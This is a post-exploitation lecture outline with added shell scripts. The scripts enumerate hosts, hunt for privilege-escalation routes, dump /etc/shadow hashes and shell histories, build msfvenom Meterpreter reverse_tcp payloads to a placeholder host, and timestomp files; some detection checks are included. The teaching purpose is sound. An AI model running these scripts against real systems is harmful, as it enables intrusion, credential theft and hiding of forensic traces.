Description: Topics covered in this lecture include:
Stages of an attack
Information gathering
Exploitation
Post-exploitation
What an attacker does after exploiting a vulnerability successfully
Possible actions
Information gathering
Find out about the compromised system
Copy data
Make modifications
Further attacks to escalate privileges or attack other connected systems
Denial of service
Impersonation
Possibilities, possibilities
Depends on the goals/motivation of the attacker
Hacktivism
Organised crime
Discuss: others?
What is possible will depend on the kind of access the attacker has managed to gain...
Having shell
One of the best results for an attacker is ending up with shell access
They can then run commands on the remote system
Potentially modify and read files
Got root?
The actions an attacker can take will depend on their security context
Such as: which user are they running as?
What security restrictions are in place?
The most access comes from having superuser access:
On a Windows system: the built-in Administrator account (its RID, the last component of the SID, is 500) and SYSTEM (NT AUTHORITY\SYSTEM)
On Unix: Root (UID == 0)
Got root?
Unix commands to check:
whoami (prints the current user name)
id (prints UID, GID and group memberships; id -u prints just the numeric UID, which is 0 for root)
Access denied
Access controls restrict what each user can do
Most programs should run as a normal (unprivileged) user, to limit the damage if they are misused or compromised
Post-exploitation information gathering
After an attack, the attacker typically wants to know more about the system
View environment variables: env
Post-exploitation information gathering
More examples:
cat /proc/cpuinfo (CPU model and features; Linux only)
free -m (memory usage in MB; Linux only)
df -h (mounted filesystems and disk usage)
uname -a (kernel version and architecture, useful when picking a local exploit)
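The following script is an added example (not part of the lecture) that combines the "got root?" check and the enumeration commands above into one report. It assumes a Unix-like target with coreutils; free and /proc/cpuinfo are Linux-only and are skipped when absent, and any command that fails is reported rather than stopping the run.

```sh
#!/bin/sh
# Added example: first-minutes enumeration after landing a shell.
# Assumes a Unix-like target; Linux-only sources (/proc, free) are optional.

# True (exit 0) when the effective UID is 0, i.e. we already have root.
is_root() {
    [ "$(id -u)" -eq 0 ]
}

# One-line summary of the security context the attacker is operating in.
security_context() {
    if is_root; then
        printf 'root (uid=0): superuser, no further escalation needed\n'
    else
        printf '%s (uid=%s, groups: %s): normal user, look for local privilege escalation\n' \
            "$(whoami)" "$(id -u)" "$(id -Gn)"
    fi
}

# Run a command only if it exists on this host, so enumeration does not stop
# on a minimal or non-Linux box that lacks e.g. free(1). A command that exits
# non-zero is reported rather than aborting the report.
run_if_present() {
    if command -v "$1" >/dev/null 2>&1; then
        "$@" 2>&1 || printf '[%s exited with status %s]\n' "$1" "$?"
    else
        printf '[%s not available on this host]\n' "$1"
    fi
}

# Print the full enumeration report to stdout.
enumerate_host() {
    printf '== security context ==\n'
    security_context
    printf '== kernel and architecture (uname -a) ==\n'
    run_if_present uname -a
    printf '== environment (env) ==\n'
    run_if_present env
    printf '== CPU (/proc/cpuinfo) ==\n'
    if [ -r /proc/cpuinfo ]; then
        head -n 8 /proc/cpuinfo
    else
        printf '[/proc/cpuinfo not present: not Linux, or /proc not mounted]\n'
    fi
    printf '== memory in MB (free -m) ==\n'
    run_if_present free -m
    printf '== disk usage (df -h) ==\n'
    run_if_present df -h
}

enumerate_host
```

Run it as the user the exploit landed you with; the first block of the report tells you whether the rest of this lecture's privilege-escalation material even applies.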
Changing attack surface
When an attacker gets access to something new, they have a different attack surface to examine
For example, a vulnerability that can only be exploited with local access becomes reachable once the attacker has a shell
They may be able to escalate their privileges further
Local privilege escalation exploits could potentially grant other access
They may be able to get root via a normal user account
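As an added example (not from the lecture), this script lists the parts of the local attack surface that a normal-user shell exposes and that a remote attacker could not see: setuid binaries, directories on PATH the current user can write to, and what sudo would allow. It assumes a Unix-like host with POSIX find(1); sudo is optional.

```sh
#!/bin/sh
# Added example: the local attack surface a normal-user shell exposes.
# Assumes a Unix-like host with POSIX find(1); sudo is optional.

# Setuid binaries below DIR (default /). A setuid-root program that is
# vulnerable, or that can be abused by design, is the classic route from a
# normal user account to root. -xdev keeps find on one filesystem.
suid_binaries() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null || true
}

# Directories on PATH that the current user can write to. A binary dropped
# there is picked up by any root cron job or script that runs commands
# without an absolute path.
writable_path_dirs() {
    printf '%s\n' "$PATH" | tr ':' '\n' | while IFS= read -r dir; do
        if [ -n "$dir" ] && [ -d "$dir" ] && [ -w "$dir" ]; then
            printf '%s\n' "$dir"
        fi
    done
}

# What sudo would let this user run; -n never prompts for a password, so
# this is safe to run blind on a target.
sudo_rights() {
    if command -v sudo >/dev/null 2>&1; then
        sudo -n -l 2>&1 || true
    else
        printf '[sudo not installed]\n'
    fi
}

printf '== setuid binaries under /usr ==\n'
suid_binaries /usr
printf '== writable directories on PATH ==\n'
writable_path_dirs
printf '== sudo rights ==\n'
sudo_rights
```

Each setuid binary listed is a candidate for a known local privilege escalation against its version; a writable PATH directory or an unexpectedly generous sudo entry is usually a faster route than an exploit.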
Post-exploitation via MSF
MSF includes post-exploitation modules
For use after a successful attack
Many post-exploitation modules simply take control of a session (a shell or Meterpreter) and automate things that an attacker would want to do:
Check whether you are in a VM
Gather information, such as config info, networking, user history, etc
Gather password hashes, for offline password cracking
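To show what modules of the checkvm and hashdump kind actually automate, here is an added example (not from the lecture and not Metasploit code) that does the same three jobs by hand on a Linux target: look for hypervisor indicators, pull the password hashes that are worth cracking offline, and collect users' shell history. File paths are parameters so the functions can also be pointed at copies pulled back from a target; the defaults are the live locations.

```sh
#!/bin/sh
# Added example: what "checkvm"- and "hashdump"-style post modules automate,
# done by hand. Assumes a Linux target; file paths are parameters so the
# functions can be run on copies pulled back from a target.

# VM check. Linux guests expose a "hypervisor" CPU flag in /proc/cpuinfo, and
# the DMI product name identifies the hypervisor. Either indicator is enough.
is_vm() {
    cpuinfo=${1:-/proc/cpuinfo}
    product=${2:-/sys/class/dmi/id/product_name}
    if [ -r "$cpuinfo" ] && grep -qE '(^|[[:space:]])hypervisor([[:space:]]|$)' "$cpuinfo"; then
        return 0
    fi
    if [ -r "$product" ] && grep -qiE 'virtualbox|vmware|kvm|qemu|hyper-v|xen|bochs' "$product"; then
        return 0
    fi
    return 1
}

# Hashes worth taking for offline cracking, from a shadow-format file.
# Locked accounts ("!" prefix), disabled ones ("*") and empty fields are
# dropped; output is user:hash, the format cracking tools expect.
crackable_hashes() {
    shadow=${1:-/etc/shadow}
    if [ ! -r "$shadow" ]; then
        printf '[%s not readable: this needs root]\n' "$shadow" >&2
        return 1
    fi
    awk -F: '$2 != "" && $2 != "*" && $2 !~ /^!/ { print $1 ":" $2 }' "$shadow"
}

# Shell history of every home directory we can read: commands users typed
# often contain passwords, internal hostnames and paths.
user_history() {
    for home in /root /home/*; do
        if [ -r "$home/.bash_history" ]; then
            printf '== %s ==\n' "$home"
            cat "$home/.bash_history"
        fi
    done
    return 0
}

if is_vm; then printf 'VM indicators found: likely a sandbox or lab target\n'
else printf 'no VM indicators\n'; fi
crackable_hashes || true
user_history
```

The shadow filter matters in practice: feeding locked or disabled entries to a cracker wastes time, and it is the same selection a hashdump module makes before reporting user:hash pairs.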
Advanced payload: Meterpreter
MSF includes an advanced payload: Meterpreter
Originally developed by Matt Miller, AKA Skape
Resides in memory, without writing itself to disk
Can “migrate” into existing processes, such as svchost.exe or explorer.exe
Traffic between the attacker and the compromised target is encrypted
Meterpreter is a staged payload...
Staged payloads
A single (inline) payload is self-contained: all of its code must fit into the space the exploit provides (e.g. the overflowed buffer)
A staged payload uses a small stager that fits in that space; the stager connects to the attacker, pulls down the rest of the payload (the stage) and executes it
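Added example (not from the lecture): Metasploit's own naming convention tells the two kinds apart, with a "/" between payload and connection method for staged payloads (linux/x64/meterpreter/reverse_tcp) and a "_" for inline ones (linux/x64/meterpreter_reverse_tcp). The script classifies names by that rule and, if msfvenom is installed, builds one of each to show the size difference. The classifier is a heuristic (cmd/* payloads such as cmd/unix/reverse_bash are singles despite the name), and 192.0.2.1:4444 is a placeholder listener address.

```sh
#!/bin/sh
# Added example: telling staged and inline (single) Metasploit payloads apart
# from their names, and generating one of each with msfvenom to compare sizes.
# Convention: staged payloads separate payload and connection method with "/",
# inline ones join them with "_". Heuristic: cmd/* payloads are singles.
# 192.0.2.1:4444 is a placeholder listener address, not a real one.

# Print "staged", "inline" or "single" for a payload name.
payload_kind() {
    name=$1
    last=${name##*/}
    case "$name" in
        cmd/*) printf 'single\n'; return 0 ;;
    esac
    case "$last" in
        reverse_*|bind_*)     printf 'staged\n' ;;
        *_reverse_*|*_bind_*) printf 'inline\n' ;;
        *)                    printf 'single\n' ;;
    esac
}

# Generate the staged stager and the inline payload as ELF files and show
# their sizes: the stager is tiny because it only fetches the stage, the
# inline payload carries all of Meterpreter. Skipped if msfvenom is absent.
compare_sizes() {
    if ! command -v msfvenom >/dev/null 2>&1; then
        printf '[msfvenom not installed; skipping generation]\n'
        return 0
    fi
    out=$(mktemp -d)
    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.0.2.1 LPORT=4444 \
        -f elf -o "$out/staged.elf" >/dev/null 2>&1
    msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.0.2.1 LPORT=4444 \
        -f elf -o "$out/inline.elf" >/dev/null 2>&1
    wc -c "$out/staged.elf" "$out/inline.elf"
    rm -rf "$out"
}

for p in linux/x64/meterpreter/reverse_tcp linux/x64/meterpreter_reverse_tcp \
         windows/shell/bind_tcp windows/shell_bind_tcp linux/x86/exec cmd/unix/reverse_bash; do
    printf '%-40s %s\n' "$p" "$(payload_kind "$p")"
done
compare_sizes
```

The practical consequence: a staged payload needs the attacker's handler reachable at the moment the stager runs, while an inline payload works from a single delivery but has to fit into the exploit's buffer.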
Meterpreter
Meterpreter has lots of advanced features that make life easier for an attacker:
Spyware (keylogging, screen capture)
System commands (ls, ps, getuid, regardless of OS)
Download and upload files
Run post exploitation modules
Pivoting: routing attacks through compromised systems
And if you want a shell, just type “shell”
Other payloads: VNC
VNC is a remote desktop protocol
After a server is installed on a remote system, a client can connect using vncviewer
Reverse connections are also possible
The client can be configured as view-only, so it observes the desktop rather than also taking control of the keyboard and mouse
Pivoting involves routing attacks via a compromised system
An Internet-facing server is likely also connected to an internal network (intranet) that the attacker cannot reach directly
Methods of pivoting
Covering tracks
An attacker may choose to take actions to avoid being caught...
Install rootkits: modify the system/OS to hide malicious files and processes
Disable, delete, or modify log files
Use anti-forensics, such as:
Steganography: hiding information within information (e.g. text in an image file)
Modifying timestamps (timestomping), so dropped files do not stand out as recently changed
Zeroing out disk contents, so deleted data cannot be recovered
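Added example (not from the lecture) of the timestamp trick above, together with the check that catches it: touch -r copies another file's access and modification times onto a dropped file, but it cannot set the inode change time (ctime), which the kernel updates to "now" on the touch itself. It assumes GNU or BSD stat(1); the rest is POSIX sh.

```sh
#!/bin/sh
# Added example: timestomping with touch -r, and the check that catches it.
# Assumes GNU or BSD stat(1); everything else is POSIX sh.

# Epoch seconds of a file's modification time and inode change time.
# GNU stat takes -c, BSD stat takes -f; try GNU first.
file_mtime() { stat -c %Y "$1" 2>/dev/null || stat -f %m "$1"; }
file_ctime() { stat -c %Z "$1" 2>/dev/null || stat -f %c "$1"; }

# Timestomp TARGET: copy the access and modification times of REFERENCE onto
# it, so a freshly dropped file looks as old as its neighbours in ls -l.
timestomp() {
    touch -r "$2" "$1"
}

# The caveat: touch can set atime and mtime but not ctime, which the kernel
# updates to "now" on any inode change, including the touch itself. A file
# whose mtime is more than TOLERANCE seconds (default 60) older than its
# ctime was either restamped or restored from an archive, and deserves a look.
ctime_mismatch() {
    tolerance=${2:-60}
    m=$(file_mtime "$1")
    c=$(file_ctime "$1")
    [ $((c - m)) -gt "$tolerance" ]
}

demo() {
    d=$(mktemp -d)
    touch -t 200001010000 "$d/legit.conf"   # an old, legitimate-looking file
    printf 'backdoor\n' > "$d/dropped"      # written just now
    timestomp "$d/dropped" "$d/legit.conf"
    printf 'dropped: mtime=%s ctime=%s\n' "$(file_mtime "$d/dropped")" "$(file_ctime "$d/dropped")"
    if ctime_mismatch "$d/dropped"; then
        printf 'ctime is much newer than mtime: timestamps were tampered with\n'
    fi
    rm -rf "$d"
}
demo
```

Package installs and archive extraction also preserve mtime, so ctime_mismatch flags candidates rather than proving tampering; it is a triage filter, not a verdict.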
Maintaining access
An attacker may want to ensure they can get access later, without using the same exploit...
Add user accounts, perhaps with superuser rights, or some other way for the attacker to escalate privileges
Leave a backdoor: a method of sending commands or logging on (typically included with a rootkit)
Perhaps as a new service that starts on boot
They may even patch the original security problem, to avoid detection
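The checks an incident responder (or the next attacker) would run for the persistence mechanisms listed above, as an added example that is not part of the lecture: a second UID 0 account, cron entries that restart something after reboot, and listening sockets that could be a backdoor accepting commands. It assumes a Linux host; file paths are parameters so the first two functions can run on copies taken from a suspect system.

```sh
#!/bin/sh
# Added example: checks for the persistence mechanisms listed above. Assumes
# a Linux host; file paths are parameters so the functions can run on copies.

# Accounts with UID 0 that are not "root": a second superuser account is the
# crudest "add a user" backdoor and should never occur on a normal system.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# Active (non-comment, non-blank) cron lines, prefixed with their file: cron
# is a favourite place to restart a backdoor after reboot. With no arguments
# it scans the system and per-user crontab locations.
list_cron_entries() {
    if [ $# -eq 0 ]; then
        set -- /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*
    fi
    for f in "$@"; do
        [ -f "$f" ] || continue
        awk -v f="$f" '!/^[ \t]*(#|$)/ { print f ": " $0 }' "$f"
    done
    return 0
}

# Listening sockets with owning processes: a backdoor that accepts commands
# has to listen somewhere. Uses ss, falling back to netstat.
listening_sockets() {
    if command -v ss >/dev/null 2>&1; then
        ss -ltnup 2>/dev/null || true
    elif command -v netstat >/dev/null 2>&1; then
        netstat -ltnup 2>/dev/null || true
    else
        printf '[neither ss nor netstat available]\n'
    fi
}

printf '== extra UID 0 accounts ==\n'
extra_uid0_accounts
printf '== active cron entries ==\n'
list_cron_entries
printf '== listening sockets ==\n'
listening_sockets
```

None of these catches a rootkit that hides its own files and sockets from userland tools, which is exactly why the lecture lists rootkits separately; for that, compare the output against an offline image or a trusted boot medium.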
What would an attacker do?
For more information please visit: http://z.cliffe.schreuders.org/
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.